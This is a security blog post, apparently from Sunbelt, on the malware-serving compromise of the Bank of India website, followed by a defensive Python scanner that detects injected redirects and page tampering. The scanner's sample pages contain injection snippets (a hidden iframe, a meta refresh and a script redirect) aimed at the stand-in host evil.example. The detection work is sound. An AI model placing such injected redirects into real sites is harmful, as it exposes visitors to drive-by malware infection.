It's back online. ComputerWorld writes about it:
As a result of the breach, persons coming to the bank’s site were likely to be temporarily redirected to another site where Trojans and other malware were downloaded onto their computers, the employee said. The user was then brought back to the bank’s site.
Well, not exactly. If you weren’t fully patched, your machine was basically hosed with crap while you were happily viewing the site.
The bank’s IT staff thought they had the situation under control Friday morning, until they found that each time they changed the index page for the site, it was immediately replaced by the hackers. The bank then decided to bring the site down.
“The Web site was hosted externally by a hosting company in the U.S.,” the employee said. The bank has since changed the company hosting the service, though the employee clarified that the change in hosting provider had been on the cards even before the hacker attack.
Ok, that might have had something to do with it…
The attack on the Web site did not affect the bank’s online banking operations, according to the employee. The bank’s customers access online banking services through a link on the home page of the bank’s site. The online banking service is provided to users from well-protected servers hosted and monitored within the bank by Hewlett-Packard Co., the employee said.
Well, this perhaps needs clarification. If someone visited the home page of the site, and they were vulnerable, they got infected — and it has nothing to do with whether the servers were protected by HP or anyone else. It's true that this was not a hack of the bank itself, but we did find at least one data-stealing trojan that someone could have gotten just viewing the site's homepage.
The bank is as yet not clear about the identity of the hackers, although Sunbelt suggested in its blog that it was a criminal gang, called the Russian Business Network (RBN). “We have called for the logs from the hosting provider in the U.S., and we may have some definite information then,” the employee said.
No, it was RBN.
And from the Height of Irony Department, this article from back in January extols the security initiatives of the Bank of India.
I'm not picking on the Bank of India. This kind of stuff is all too common, and it simply highlights the fact that anyone who has a presence on the web is responsible for ensuring that their site is clean and safe for visitors — and especially when you have people like RBN out there, just looking for any vulnerability to use to infect users.
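The practical version of "keep your site clean for visitors" is to watch your own index page for exactly the kind of change described above: a page that is replaced under you and quietly sends visitors off-site. The following is an added example, not code from the original post, from Sunbelt or from the bank. The post does not say which mechanism the attackers used; the scanner below looks for the usual ones (a hidden or zero-size iframe, a meta refresh, a script that rewrites location, or a script loaded from another host) and also compares the page against a known-good hash. The host names, the sample pages and the helper names are constructed for the example.

```python
"""Check a site's own index page for injected off-site redirects.

Added example, not from the original post. Hosts (bank.example,
evil.example), sample HTML and function names are constructed.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


def _offsite(url, site_host):
    """True if url points at a host other than our own."""
    host = urlparse(url).hostname
    return bool(host) and host.lower() != site_host.lower()


class _InjectScanner(HTMLParser):
    """Collects (kind, url) findings for content that sends visitors off-site."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style or tiny
            if hidden and _offsite(src, self.site_host):
                self.findings.append(("hidden_iframe", src))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content") or "", re.I)
            if m and _offsite(m.group(1), self.site_host):
                self.findings.append(("meta_refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True
            src = a.get("src") or ""
            if _offsite(src, self.site_host):
                self.findings.append(("offsite_script", src))

    def handle_data(self, data):
        # HTMLParser hands us raw <script> bodies here; keep them for inspection.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_buf)
            self._script_buf = []
            for m in re.finditer(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)", body):
                if _offsite(m.group(1), self.site_host):
                    self.findings.append(("script_redirect", m.group(1)))


def find_injected_redirects(html, site_host):
    """Return a list of (kind, url) for off-site redirects found in html."""
    scanner = _InjectScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def page_changed(html, known_good_sha256):
    """True if the fetched page no longer matches the hash taken from a clean copy."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest() != known_good_sha256


# Constructed sample pages: a clean index page and three tampered variants.
CLEAN_INDEX = ("<html><body><h1>Welcome</h1>"
               "<a href='https://bank.example/netbanking'>Online banking</a></body></html>")
KNOWN_GOOD = hashlib.sha256(CLEAN_INDEX.encode("utf-8")).hexdigest()
IFRAME_INDEX = CLEAN_INDEX.replace(
    "</body>", "<iframe src='http://evil.example/in.cgi' width=0 height=0 "
               "style='display:none'></iframe></body>")
META_INDEX = CLEAN_INDEX.replace(
    "<body>", "<body><meta http-equiv='refresh' content='0;url=http://evil.example/x'>")
SCRIPT_INDEX = CLEAN_INDEX.replace(
    "</body>", "<script>window.location.href='http://evil.example/go';</script></body>")

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_INDEX), ("iframe", IFRAME_INDEX),
                       ("meta", META_INDEX), ("script", SCRIPT_INDEX)]:
        print(name, "changed:", page_changed(page, KNOWN_GOOD),
              "findings:", find_injected_redirects(page, "bank.example"))
```

In practice this would be run from a host outside the hosting provider, fetching the page the way a visitor would; a hash mismatch alone is enough to alert, and the redirect findings tell you whether the change is cosmetic or hostile. The hash check is also what would have caught the repeated re-defacement within minutes rather than after the fact.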
As a final note, credit (long overdue) for the discovery of this hack last week goes to Adam Thomas, in Sunbelt’s malware research team.
Alex Eckelberry